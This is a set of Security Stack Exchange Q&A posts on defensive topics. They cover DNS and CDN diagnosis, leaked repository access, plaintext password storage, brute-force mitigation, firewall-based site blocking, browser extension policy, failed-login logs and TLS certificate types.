I've found that some .gov sites are being redirected to a Chinese IP. I have searched across Internet to see if this a known form of malware but I'm unable to find any info. I would like someone guiding me to isolate the infected files and report to AV if applicable. This is a nslookup resolution from the infected computer: C:\Users\Alex>nslookup www.whitehouse.gov Servidor: google-public-dns-a.google.com Address: 8.8.8.8 Respuesta no autoritativa: Nombre: www.whitehouse.gov Address: 139.129.57.70 This is a valid response from a Linux computer in the same network: alex@nas:~$ nslookup www.whitehouse.gov Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: www.whitehouse.gov canonical name = wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net canonical name = e4036.dscb.akamaiedge.net. Name: e4036.dscb.akamaiedge.net Address: 104.83.16.193 As you can see something is intervening the DNS requests and redirecting to 139.129.57.70, that is a Chinese IP. I think this computer is infected by some kind of malware made to impersonate as gov sites and leak info. Any clue about which files may be infected?
Content Delivery Network This is probably part of a Content Delivery Network with a lot of political issues to consider. If you try dig www.whitehouse.gov a , underneath the answer section you'll see the following: www.whitehouse.gov. 131 IN CNAME wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net. 731 IN CNAME e4036.dscb.akamaiedge.net. e4036.dscb.akamaiedge.net. 20 IN A 23.73.28.110 See the CNAME addresses? Try host -t A www.whitehouse.gov for a better explanation: www.whitehouse.gov is an alias for wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net is an alias for e4036.dscb.akamaiedge.net. e4036.dscb.akamaiedge.net has address 23.73.28.110 Do you notice that I'm getting a different IP address than you? Note the wildcard*edge* portion? What is that? It's an edge server which is supposed to be closest to you. Are you using a VPN on your Linux machine, or Windows Machine? Maybe one that's in Hong Kong, Hangzhou, or somewhere else in East Asia? Maybe your router is configured to use a VPN, or go through TOR? The IP address you received belongs to Aliyun Computing Co. Ltd, which is part of the Alibaba Cloud/CDN suite. But wait, how did we we get an Aliyun Cloud/CDN (Alibaba) IP address from Akamai? Aren't they competitors? Again, are you using a VPN on your Linux machine, or Windows Machine? Maybe one that's in Hong Kong, Hangzhou, or somewhere else in East Asia? Maybe your router is configured to use a VPN, or go through TOR? Akamai does operate in China , but... Want to make money in China? You have to follow Beijing's rules. I think we just found something embarrassing for Akamai: in order to operate in China, they were likely forced into a partnership with them. To do business in China, almost all foreign companies were previously required to hand over control of their intellectual property to a joint Chinese partner to be allowed to operate in the country. Let's look at the IP you gave us: whois 139.129.57.70 | grep -i 'Ali\|Hangzhou' : netname: ALISOFT descr: Aliyun Computing Co., LTD descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China , 310099 address: NO.969 West Wen Yi Road, Yu Hang District, Hangzhou e-mail: jiali.jl@ alibaba-inc.com address: No.391 Wen'er Road, Hangzhou City e-mail: anti-spam@list. alibaba-inc.com e-mail: cloud-cc-sqcloud@list. alibaba-inc.com address: Hangzhou, Zhejiang, China address: No.391 Wen'er Road, Hangzhou City e-mail: guowei.pangw@ alibaba-inc.com In this case, the Akamai partner is likely Alibaba/Aliyun. This allows the Chinese government, if they so desire, to serve malicious content to visitors by way of the CDN. Every single CDN is, in my opinion, MITM as a service. Wireshark? You might be doing it wrong. What if you did have a DNS hijacking/MITM issue of some sort? If you want to use Wireshark, you probably cannot do a packet capture between your router and computer unless the problem exists primarily on your Windows 10 machine. You'd simply be receiving whatever your router provides you with. If there is no problem with your Windows 10 machine, then using Wireshark on your computer will likely not provide you any meaningful information. What if your router has been compromised? What you could do is put a switch with port mirroring capabilities between your gateway and your router, and use the port mirror to see what's going on. Or a LAN throwing star. This way, you can see what your router is sending and receiving, and compare that to what Wireshark sees.
{ "source": [ "https://security.stackexchange.com/questions/174005", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164300/" ] }
174,082
There has been a post on Niebezpiecznik.pl, a popular InfoSec blog, describing an interesting situation. A company mistakenly granted access to their BitBucket repo to a random programmer. This programmer subsequently alerted various employees of the company, urging them to revoke access ASAP. He found these employees sluggish (for example, one said he would only revoke the access once he was back from his vacation), so he alerted the Niebezpiecznik blog, which subsequently contacted the company. Only then was access revoked. It is clear that the programmer considered the lack of prompt revocation of access to be a very grave oversight on the part of the company's security policy. And here is where I'm surprised. So, let's consider this from the company's point of view. Someone contacts them, claiming that he has been spuriously granted access to their private repo and urging them to revoke this access. Now this person either is or is not interested in the contents of this repo; he also either has or does not have strong enough moral values to refrain from downloading it. If he's willing to inspect the contents of the repo, he's already had ample time to do this; and if he hasn't done this yet, then he will likely still not have done this by the time the employee is back from his vacation. In other words, the milk has already been spilled and nothing worse than what has already happened is likely to happen in the future. As a result, I would think, the situation is no longer urgent and can safely wait until the employee is back from his vacation. Where am I wrong?
There's a number of reasons: If it has happened to one person, it might have happened to more. These other people might not be as kind. Who knows, this person might change their mind. When they made the effort to contact you, and just gets a "meh" in return, they might be a bit annoyed and decide to punish you for it. Or maybe they just want to poke around a bit for fun, and accidentally break something. You probably want to check the logs to see that this person is telling the truth. Maybe they silently stole your encryption keys before contacting you. You probably want to rotate all your secrets just to be sure. And most importantly, this is a Big F*cking Deal™. Anyone who is not reacting with shock and horror, but instead orders another piña colada, clearly doesn't understand the gravity of the situation. There's some very good points in comments and this answer that all might be fine under certain circumstances (e.g. read only access, no secrets in the code, etc.). That is correct, but I would still argue that this should be taken more seriously. Are you really 100% sure there are no secrets in some old commit in your repo? The very fact that someone who shouldn't have access to your systems got it anyway is in itself a bad omen.
{ "source": [ "https://security.stackexchange.com/questions/174082", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108649/" ] }
174,085
I stay at a dorm. I am wondering about the security of the log-in wifi system. I want to know if my browsing history can be seen by the internet-admin that I'm connecting with. If I install an OS on a virtual machine, will I be safe from the attacker (because I'm still connecting to the public wifi)?
{ "source": [ "https://security.stackexchange.com/questions/174085", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164376/" ] }
174,125
I'm a parent who has a parent account with my local school district so that I can log in to their website to view my child's grades etc. I clicked the "forgot password' button, and my password was emailed to me in plain text. This concerned me, so I emailed the principal, including some links from the bottom of this page . This is the reply I received from the organization's IT department: Parent passwords are not stored in plain text. They are encrypted. Not a 1 way encryption but a 2 way encryption. This is how the system is able to present it back via an email through Ariande's CoolSpool utility. For support reasons, the parent password is visible to certain staff until the parent has successfully signed in 3 times. After that, no staff can see that password. However, it is stored in such a way that the system itself can send it back to the verified email. In the future after a parent's 3 successful sign ins, if they forget their password, their verified email account will be sent a link to reset their password, this change is in the works. Does this explanation justify the plain text password being sent by email, and are my passwords secure with them? If not, what references or resources could I reply to them with?
No, this is not a good practice. There are two distinct problems. encrypting the password instead of hashing it is a bad idea and is borderline storing plain text passwords. The whole idea of slow hash functions is to thwart the exfiltration of the user database. Typically, an attacker that already has access to the database can be expected to also have access to the encryption key if the web application has access to it. Thus, this is borderline plaintext; I almost voted to close this as a duplicate of this question , because this is almost the same and the linked answer applies almost directly, especially the bit about plaintext offenders; there is another answer about plaintext offenders as well. sending the plain text password via plain text email is a bad idea. They could argue that there is no difference when no password reuse happens, but I doubt they would even know what that is and why it’s considered bad practice. Also, password reuse is so common that that wouldn’t be a good answer. Additionally, as they seem to be working on the second part (even though password reset links in plain text emails are in the same ballpark, i.e. a threat that can read the password from the plain text mail can also read the link, maybe before you can), you could explain them the problem about not hashing from my answer, also feel free to link this answer directly. Maybe even explain that encryption is one way, but can always be reversed by the inverse function of the crypto system in question, aptly named decryption. Using terms like "one way encryption" and "two way encryption" rather than "hashing" and "encryption" shows a lack of understanding. The real problem is: them implementing a password reset does not mean they will hash (correctly) in the future; there is not much you can do about this except using a password manager and create a long, strong passphrase that is unique for this site and hope for the best. This is especially true since they seem to want to keep the part of their system that tells staff your password (for absolutely no good reason). The implication being they keep not hashing properly - them saying staff can only see the password in that three login timeframe is not true; if the web app can access the key, so can the administrative staff. Maybe no longer the customer support staff but they shouldn’t be able to see it in the first place. That is horrifically bad design. Depending on your location, schools as being part of the public sector have obligations to have a CISO you can contact directly, expressing your concerns. And as usual in the public sector, there ought to be an organization that is supervising the school; they should have a CISO at least, who might be quite interested in this proceeding.
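For contrast with the reversible "two way encryption" described in their reply, a proper scheme stores only a salted, deliberately slow hash that can be verified but never turned back into the password. A minimal sketch using PBKDF2 from Python's standard library (the iteration count is an illustrative choice):

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # tune to the hardware; higher means slower for attackers too

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest  # store both; the password itself is not recoverable

def verify_password(password, salt, stored_digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored_digest)
```

With storage like this, emailing the password back is impossible by construction, which is exactly the point.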
{ "source": [ "https://security.stackexchange.com/questions/174125", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164408/" ] }
174,218
I am designing a 'secure' login system. Let's focus on brute force prevention. In my Android client I have a counter that counts the number of times the user tries to log in with false credentials. When it reaches 3 failed attempts, I disable the login button and the password field, forcing the user to restart the app, and thus blocking the brute force attack. Is this the right thing to do? Or should I put a counter on the server? But on the server it could lead to DoS if I receive a lot of brute force attempts at the same time, right? The idea is to stop an infinite number of attempts, so in my opinion this can be done on the application side, in my case in the Android client. I'm open to suggestions.
Client side measures are only a partial (and mostly cosmetic) solution, this can only limit non-serious attempts. Any serious attempt will either hit your server directly because a login URL/API was detected, or will run your client through an intercepting proxy to capture the details required to create a brute force run. Robust defences generally require you to assume that the attacker knows everything about the system except the secret key ( Kerckhoff's Principle ) so you should start from that position. Mitigating measures include: make it hard/impossible for an attacker to determine valid user names, invalid passwords or locked out accounts (basically minimal feedback, i.e. no "invalid username" or "password too long" messages, though issue a unique incident code if this is important for user support). As noted in the comment by My1 , open registration may be a weak point here. make it hard to determine anything other than success or failure, a failed login should take the same time as a successful one — this usually means making both artificially long (200ms is a starting point) make the login API multi-step using a nonce or some time- or session-based token to complicate automated attacks, and prevent distributed attacks; or add some client-side proof of work (client side password hashing is one option, but needs careful consideration ) make sure the password space is sufficiently large, encourage (and support!) the use of a password manager use account lockout and source IP lockout with exponentially increasing lockout times (e.g. double the lockout time on each failure, this should avoid annoying a user who gets a password wrong a couple of times). As noted in the comments, this is an opportunity for DOS, so consider the tradeoffs carefully implement adaptive rate-control and malicious activity detection (this is generally harder than any of the other solutions as it requires additional state and logic on the server side) consider adding an "under attack" mode of operation that can be enabled as required, ideally this will have minimal impact on users From CAPEC-112 Brute Force : The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. See also CAPEC-49 Password Brute Forcing
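A sketch of the exponentially increasing lockout idea from the list above; the state is kept in memory here and the base delay is arbitrary, so treat it as an illustration rather than a drop-in implementation.

```python
import time

_failures = {}  # key (username or source IP) -> (failure_count, locked_until)

BASE_LOCKOUT = 2  # seconds; doubles with every further failure

def is_locked(key: str) -> bool:
    _, locked_until = _failures.get(key, (0, 0.0))
    return time.monotonic() < locked_until

def record_failure(key: str) -> None:
    count, _ = _failures.get(key, (0, 0.0))
    count += 1
    lockout = BASE_LOCKOUT * (2 ** (count - 1))
    _failures[key] = (count, time.monotonic() + lockout)

def record_success(key: str) -> None:
    _failures.pop(key, None)
```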
{ "source": [ "https://security.stackexchange.com/questions/174218", "https://security.stackexchange.com", "https://security.stackexchange.com/users/139435/" ] }
174,224
I would like to know how you make employees report incidents. Incident reports are a key element of an ISMS. No reports = No discovery of the incident = High chance things go out of control. We have a kind of game: people can give red cards to each other for small incidents. The cards tell them to report the incident, but people don't want to. I can imagine we have to use a reward system (focus on positive) to make people report and do their best to limit incidents, but how? The reporting system currently works like this: Person B.A. sees Person A.B is not locking his computer. He then (should) give(s) a red card to the person, takes a picture and send it to the incident@company email with the name of the person in the mail. The mail goes to InfoSec team (not only IT guys btw) who then put it in the system. Now, no-one sends those emails. I am checking to get enough reports for the audit, but that means people will not report because I will. I did stop checking for a month, then the number dropped to 1/4 of the previous month. I started checking again and it immediately rose... What to do? -Edit-important note: I am a student, doing this as internship. I am an engineering management student, new to this area when I started 3months ago, no IT knowledge. The company is an IT company in Bulgaria. Now 200 employees, last year 100. Now everything is changing very fast of course. That is not the way it should be but the way it is. Please take those things into consideration when you reply. Feedback is welcome, but please tell me How
Of course no one wants to report, they are "turning in" their peers. Also, the time and complexity it takes to go through the reporting process you described is another negative reinforcement. You are only going to get low compliance if everything is a negative. And ... YOU CANNOT FORCE PEOPLE TO DO ANYTHING!! You are approaching the problem backwards. You need to: use technical controls so that people do not have to think (set an auto-lockout time on idle workstations) reward people for doing the right thing (and no, reporting their peers is not the right thing) Instead of punishing non-locked stations, reward people who locked their stations! Praise them publicly, offer them a chocolate. Whatever works for that office/local culture. Your focus, at the moment, is to collect metrics for your incident reports. I suggest that this is also backwards. Locking a station is a behaviour . Not locking a station is not an incident (it's an event, at best). You are never going to get accurate metrics, so I'm not sure why this would be a focus. I know that it is a huge mental shift, but there is a big difference between an intentional act of omission or commision (to not do or to do something) to violate policy (an incident) and inattention and inertia that results in non-compliance. You cannot confuse the two. Non-compliance is a behaviour issue, which needs to be handled (and tracked) differently. To answer your question directly, in order to get people to do things, you need to address 3 factors: motivation ability trigger They have to want to do it, it needs to be easy to do, and the trigger for when they are supposed to do it needs to be clear (the Fogg Model ). Scratching an itchy nose has high motivation, it's easy to do, and the itch is its own trigger. So, everyone does it reliably. Reporting your peer for not locking a workstation has low motivation (even if you rewarded them for reporting), the process is complex, and the trigger is also not that clear. When does one deem that there is non-compliance? Does one have to be watching all the time? What if the other user stepped away and was within view of their workstation? What if the user is "looking out" for the workstation to ensure there is no unauthorised access? You simply are on the wrong side of the Fogg Model. Address these 3 factors, and you can experience high compliance.
{ "source": [ "https://security.stackexchange.com/questions/174224", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164379/" ] }
174,235
From what I understand, it is impossible to verify whether a file has been modified since its creation. Specifically, I was wondering whether it was possible to verify whether a photo was modified since its capture. However, according to the question " How to detect if a photo's metadata has been changed? " it is not: It is sadly impossible to prove when an image (or any file for that matter) originated. It is possible (if the author wants to) to prove that a file existed prior to a given time by signing the file from a third party time stamping server (through which the third party proves that the file existed at the time of the signing) but such information is not automatically possible and can easily be stripped. I am also an IT Security guy and there is no possible secure way to prove the creation date of any file if the user controls the system creating the file with current technology that I am aware of. The best bet would be a device with a locked clock that would have a hidden key store that the user shouldn't have access to and create a signature based on this so that they couldn't fake their own signature, but since the key must still reside in the device, it is still feasibly possible for someone to break as all the necessary information is in their possession, even if it is hard to get to. I feel like this explanation is somewhat similar to why DRM does not work (you can't give a person the lock and the key), but I'm still not clear on the explanation. I also think this is different from how TLS/SSL works . In the aforementioned case, you're trusting a source to give you files without any information on how many times the files were altered.
I think you will want more of a philosophical answer than a technical one, given what you are rejecting. A file is just a discrete collection of bits. Relevance and meaning are overlaid onto those bits by a human, but ultimately, it's just bits. How would it be possible to determine if the bits you have are in the same sequence in some unknown previous state? Answer: saving that state in a way that can be trusted to be used as a means of comparison. That's why TLS/SSL uses 3rd party CAs to verify certificates, and why digitally signing files is useful. They provide a trusted means of having a state to compare. It's not perfect, but very effective if performed correctly.
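As a small illustration of "saving that state in a way that can be trusted": comparing a file against a previously recorded digest only tells you whether the bits changed since the digest was taken, and only if the reference digest is kept somewhere the user cannot alter (a third party, a signed timestamp, etc.). A minimal Python sketch; the file name and the reference value are just placeholders:

import hashlib

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

# Digest recorded earlier and kept somewhere tamper-evident (placeholder value).
reference = "0000000000000000000000000000000000000000000000000000000000000000"

current = sha256_of("photo.jpg")
print("unchanged since the digest was recorded" if current == reference else "modified, or never matched")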
{ "source": [ "https://security.stackexchange.com/questions/174235", "https://security.stackexchange.com", "https://security.stackexchange.com/users/12306/" ] }
174,350
I'm a Linux noob, and while looking for a simple OS-level website blocking technique, I came upon the solution of using the Linux hosts file like so: 127.0.0.1 websiteiwanttoblock.com 127.0.0.1 anotherone.com ... This is nice and simple - perfect for my purposes, but here's my question: if I often use 127.0.0.1 for web development purposes, is this dangerous? It seems that, at the very least, it could mess up the web dev project I'm currently working on. For example, if Chrome/Firefox makes a request to websiteiwanttoblock.com/api/blah , would that then make a request to 127.0.0.1/api/blah and potentially mess with my project's API? If this is dangerous in that regard, is there a safer "null" IP address that I could redirect blocked sites to? I know it's probably not good practice to use the hosts file like this, but I just love the simplicity of editing a text file rather than downloading a package or whatever. Edit: Oh, and I often use port 3000 for dev stuff, but let's assume that I sometimes use 80, or any other available port number.
Short Answer Is it safe to use the /etc/hosts file as a website blocking "null" address? I would argue the answer should be: No. If for no other reason than the requests are not actually "nulled". They are still active requests. And as the OP indicates, since the requests are for legitimate Internet hosts, this sort of short cut method of redirecting requests to localhost may interfere with testing networking code in a development environment. Perhaps a better method of blocking traffic to and from certain Internet hosts, is to utilize iptables which is the interface to the Linux kernel's firewall. iptables is the default networking rule table for most GNU/Linux systems. Some distros use ufw as a front-end to iptables . If you want to use iptables , here's a simple script which will DROP all incoming and outgoing packets for a list of IP addresses or hostnames with one address or hostname per line contained in a plain text file called ~/blocking.txt ## Block every IP address in ~/blocking.txt ## DROP incoming packets to avoid information leak about your hosts firewall ## (HT to Conor Mancone) REJECT outgoing packets to avoid browser wait for i in $(cat ~/blocking.txt); do echo "Blocking all traffic to and from $i" /sbin/iptables -I INPUT -s $i -j DROP /sbin/iptables -I OUTPUT -d $i -j REJECT done Sample ~/blocking.txt websiteiwanttoblock.com anotherone.com ip.add.of.net/mask Do not place your localhost IP addresses in this file. Longer Answer While reassigning Internet hosts to localhost in the /etc/hosts file is a common short cut technique to block unwanted Internet hosts, this method has some serious security drawbacks. Incoming requests Incoming requests which were not purposefully initiated via a specific user request. The most common example is ads on webpages. Let's follow the incoming packets... First, I start up wireshark . Then I place the biggest Internet ad company in my /etc/hosts file with this line: 127.0.0.1 google.com And then disable all ad blockers in my browser, navigate to youtube and play any random video. If I filter my packets, broadly including Google's IP address space: ip.addr==172.217.0.0/16 I am still receiving packets from Google. What does this mean? It means that there is a possibility of a malicious server inserting malware which may be able to attack my computing platform via packets that are still arriving and sent to localhost. The use of /etc/hosts rather than dropping or rejecting the packets via the firewall rules, is a poor security measure. It does not block incoming packets from possible malicious hosts, nor does it provide effective feedback for trouble shooting purposes. Outgoing requests Outgoing requests which are sent to localhost rather than being rejected or dropped by the firwall rules are still being processed by the kernel. There are a few undesirable actions that occur when /etc/hosts is used rather than the firewall: Extra processing is occurring when the outgoing packet hits localhost. For example, if a webserver is running on the host, the packet sent to localhost may be processed by the webserver. The feedback from outgoing requests may become confusing if the /etc/hosts is populated with certain domains. iptables can handle lots of rules According to some: ServerFault: How many rules can iptables support A possible theoretical limit on a 32-bit machine is 38 million rules. However, as noted in the referenced post, as the iptables rule list expands so does the needed kernel memory.
{ "source": [ "https://security.stackexchange.com/questions/174350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
174,405
This has been going on for about 1-2 days now: heinzi@guybrush:~$ less /var/log/mail.log | grep '^Nov 27 .* postfix/submission.* warning' [...] Nov 27 03:36:16 guybrush postfix/submission/smtpd[7523]: warning: hostname bd676a3d.virtua.com.br does not resolve to address 189.103.106.61 Nov 27 03:36:22 guybrush postfix/submission/smtpd[7523]: warning: unknown[189.103.106.61]: SASL PLAIN authentication failed: Nov 27 03:36:28 guybrush postfix/submission/smtpd[7523]: warning: unknown[189.103.106.61]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 04:08:58 guybrush postfix/submission/smtpd[8714]: warning: hostname b3d2f64f.virtua.com.br does not resolve to address 179.210.246.79 Nov 27 04:09:03 guybrush postfix/submission/smtpd[8714]: warning: unknown[179.210.246.79]: SASL PLAIN authentication failed: Nov 27 04:09:09 guybrush postfix/submission/smtpd[8714]: warning: unknown[179.210.246.79]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 05:20:11 guybrush postfix/submission/smtpd[10175]: warning: hostname b3d0600e.virtua.com.br does not resolve to address 179.208.96.14 Nov 27 05:20:16 guybrush postfix/submission/smtpd[10175]: warning: unknown[179.208.96.14]: SASL PLAIN authentication failed: Nov 27 05:20:22 guybrush postfix/submission/smtpd[10175]: warning: unknown[179.208.96.14]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 06:42:43 guybrush postfix/submission/smtpd[12927]: warning: hostname b18d3903.virtua.com.br does not resolve to address 177.141.57.3 Nov 27 06:42:48 guybrush postfix/submission/smtpd[12927]: warning: unknown[177.141.57.3]: SASL PLAIN authentication failed: Nov 27 06:42:54 guybrush postfix/submission/smtpd[12927]: warning: unknown[177.141.57.3]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 08:01:08 guybrush postfix/submission/smtpd[14161]: warning: hostname b3db68ad.virtua.com.br does not resolve to address 179.219.104.173 Nov 27 08:01:13 guybrush postfix/submission/smtpd[14161]: warning: unknown[179.219.104.173]: SASL PLAIN authentication failed: Nov 27 08:01:19 guybrush postfix/submission/smtpd[14161]: warning: unknown[179.219.104.173]: SASL LOGIN authentication failed: VXNlcm5hbWU6 There is one single failed login attempt every 1-2 hours, always from the same domain, but every time from a different IP address. Thus, it won't trigger fail2ban and the logcheck messages are starting to annoy me. :-) My questions: What's the point of this kind of "attack"? The rate is much too slow to do any efficient brute-forcing, and I really doubt that someone would specifically target my tiny personal server. Is there anything I can do against it except banning that provider's complete IP range? I could just stop worrying and add those messages to my logcheck ignore config (since my passwords are strong), but that might cause me to miss more serious attacks.
What's the point of this kind of "attack"? The rate is much too slow to do any efficient brute-forcing, and I really doubt that someone would specifically target my tiny personal server. You may be seeing connections very rarely, but how do you know the bots doing the brute forcing aren't constantly saturating their uplinks, and your site is just one of many being attacked? There is no advantage for an attacker to spend a short time going after one site at a time (and triggering fail2ban), compared to attacking a huge number of servers at once, where each server only sees infrequent connections. Both can have the same total rate of outgoing authentication attempts per second, but attacking one site at a time is simply a less efficient use of the attacker's bandwidth. Is there anything I can do against it except banning that provider's complete IP range (or ignoring the messages, since my passwords are strong)? No, not really. Chances are, these are coming from a botnet or a cluster of low-cost VPSes. It is not possible to determine what other IP ranges may be being used just by seeing a few of these. If they are not on the same subnet, they cannot be predicted. You can safely ignore these connections. It is nothing more than the background noise of the internet. Just make sure you aren't low-hanging fruit.
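If you want to keep an eye on this background noise without relying on fail2ban's per-IP thresholds, you can aggregate the failures yourself. A rough Python sketch that counts SASL failures per /24 source network, based on the log lines quoted in the question (the log path and the grouping are assumptions; adjust to taste):

import re
from collections import Counter

# Matches the "SASL ... authentication failed" warnings shown above.
pat = re.compile(r"warning: \S+\[(\d+\.\d+\.\d+\.\d+)\]: SASL \w+ authentication failed")

per_subnet = Counter()
with open("/var/log/mail.log") as log:
    for line in log:
        m = pat.search(line)
        if m:
            subnet = ".".join(m.group(1).split(".")[:3])  # group by /24
            per_subnet[subnet] += 1

for subnet, count in per_subnet.most_common(10):
    print(f"{subnet}.0/24: {count} failed attempts")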
{ "source": [ "https://security.stackexchange.com/questions/174405", "https://security.stackexchange.com", "https://security.stackexchange.com/users/12244/" ] }
174,409
Recently, the company I work for has forbidden usage of any extensions in Chrome. They also do not allow account sync. This affected virtually all Web developers since they use Chrome to test their front-end code and use an extension or two to improve productivity (JSON view, Redux dev tools). Unfortunately, this has changed overnight without proper communication and there is no clear reason for this change. However, I have noticed that I am able to use a portable version of Firefox and install all needed extensions. Currently I am using Chrome 62.0 and Firefox 56.0.2 (portable). I use the portable version because the company officially allows FrontMotion and I do not want to mess with its installation. This rather old post does not show any serious security problems for Google Chrome (except for privacy). Question: Are there any objective reasons to forbid Google Chrome's extensions, but allow Firefox extensions?
I cannot answer the asked question, but I hope this could shed some light on your problem. Should corporate security rules forbid usage of some browser extensions? IMHO the answer is YES here. Browser extensions can do virtually anything on behalf of the regular browser. That means that a local firewall will not detect them. Are there objective reasons to trust XXX (put whatever browser or browser extension here) more than YYY (another browser or browser extension)? Well, in IT security trust is based on two major pieces: audit of code and reputation. The former is objective, while the latter is not, but I must admit that I mainly use the latter because I have neither enough time nor enough knowledge to review everything, so I just rely on external advice from sources that I trust. When I rely on HTTPS to secure a channel, I must trust the certificate owner not to do bad things with the data once it has received it, and I trust the certificate signer. Long story short, it may be possible to say whether an extension has a better reputation than another one, but it can only be judged per extension and not globally per browser. Is usage of a portable Firefox an acceptable solution in your use case? Still my opinion, but unless you are in a hierarchical position that allows you to ignore a rule from the security team, I want to say a big NO here. My advice is that you should first make a list of the extensions you commonly use, and possible replacement ones. Then you should try to gather as many elements as you can on their objective security and on their reputation (still from a security point of view). Then you should tell your manager that the recent forbidding of Chrome extensions leads to a net decrease in productivity, and ask him to propose to the security team a list of extensions you need, with possible replacements (Firefox extensions instead of Chrome ones, for example). Then either they agree on an acceptable list, or the question should climb higher in the organization hierarchy, until someone who is accountable for both global security and global productivity takes a decision. Silently ignoring corporate rules is always a bad decision, because the person who has global authority has no way to know that some rules are not being followed. And if your boss decides that security is more important than productivity, or the opposite, he has the authority for that choice while you may not.
{ "source": [ "https://security.stackexchange.com/questions/174409", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164712/" ] }
174,421
On our WS2012 R2, I see multiple 4625 logon audit failures. Anything between once every 5 minutes to 5 times a minute. The usernames that fail the logon attempt change frequently. But seem to be from a list of commonly used usernames (Administrator, User, Test, Sales, Bob, Intern, Admin2, BOARDROOM, BARBARA, ALAN, COPIER, BACKUP, XEROX, USER1, RECEPTION etc. ). These failed attempts also seem to continue 24/7. Since we are a pretty small company, I am quite sure that these are not legit attempts and are automated. Below is an example log from Windows logs security. Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: NULL SID Account Name: BOARDROOM Account Domain: Failure Information: Failure Reason: Unknown user name or bad password. Status: 0xC000006D Sub Status: 0xC0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 Am I right to worry that we are hacked? How would I find out from where these failed logon attempts are coming from and stop them?
{ "source": [ "https://security.stackexchange.com/questions/174421", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164731/" ] }
174,688
I understand SSL is the predecessor of TLS. What about EV SSL? We are using a payment gateway that is rolling out a change soon and will require TLS1.1 or higher. We are currently using a SSL from Godaddy and they said that if we want to upgrade the highest they have is EV SSL. Wanted to understand if EV SSL is equivalent to TLS1.1 or lower.
I think there's a mismatch in terminology between the SSL/TLS protocol (messages sent over a network) and SSL Certificate Authorities who issue digital certificates to be used with TLS/SSL and / or other crypto protocols. SSL/TLS You are correct that SSL is the precursor to TLS. This refers to crypto configuration in your server with higher versions indicating more modern crypto: SSL 1.0 (obsolete) SSL 2.0 (obsolete) SSL 3.0 (mostly obsolete) TLS 1.0 TLS 1.1 TLS 1.2 These are settings you configure in your webserver, and govern which crypto a browser will use when connecting to your server. You do need a certificate for your server in order to enable SSL/TLS, but for the most part, any certificate you get from a CA can be used with any version of TLS. SSL Certificate Authorities A Certificate Authority issues certificates for use with TLS and / or other crypto protocols like S/MIME email, signing PDF documents, etc. Most CAs market their "web server" type certs as "SSL" rather than "TLS" for historical reasons. Most CAs offer various price points of certificate, usually broken into: Domain Validated (DV) Organization Validated (OV) Extended Validation (EV) This refers to how much time their humans spend doing background checks to ensure that you do in fact own the web site that you are requesting a cert for. They check things like: can you post a file they provide somewhere on the site? Does the DNS record for that domain list you as the owner? If the DNS record lists a company, are you in fact an employee with authorization to request certificates on behalf of that company? And so on, with DV certs just doing the automated "can you upload a file?" checks, and EV sometimes requiring face-to-face meetings between you and the CA, and original hand-signed documents from the CEO. Consequently, browsers display bigger, greener lock icons for EV to indicate to users that the browser is extra confident that this is not a phishing site. (EV certs are where you see the legal name of the company as part of the TLS lock icon). Note that bigger greener locks have nothing to do with the type of crypto or version of TLS used. Bottom line: The level of certificate you buy (DV, OV, EV) and the version of TLS that you configure your server for (SSLv3, TLS1.2, etc) have almost nothing to do with each other. All levels of certificate use the same type of cryptography, and all certs are compatible with all versions of the TLS protocol.
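If you want to see the two things separately for your own server - which protocol version a client negotiates, and what the certificate says - Python's standard ssl module can show both. A small sketch (the hostname is just an example):

import socket
import ssl

host = "www.example.com"   # any HTTPS site you want to inspect
ctx = ssl.create_default_context()
with socket.create_connection((host, 443), timeout=5) as sock:
    with ctx.wrap_socket(sock, server_hostname=host) as tls:
        print("Negotiated protocol:", tls.version())        # e.g. 'TLSv1.2'
        cert = tls.getpeercert()
        print("Certificate subject:", dict(x[0] for x in cert["subject"]))
        print("Issued by:", dict(x[0] for x in cert["issuer"]))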
{ "source": [ "https://security.stackexchange.com/questions/174688", "https://security.stackexchange.com", "https://security.stackexchange.com/users/165083/" ] }
174,724
I type www.facebook.com into my browser's address bar and press enter, then use Facebook. Could I actually be visiting a fake Facebook even if I see a URL of https://www.facebook.com and a lock icon by the side of the address bar?
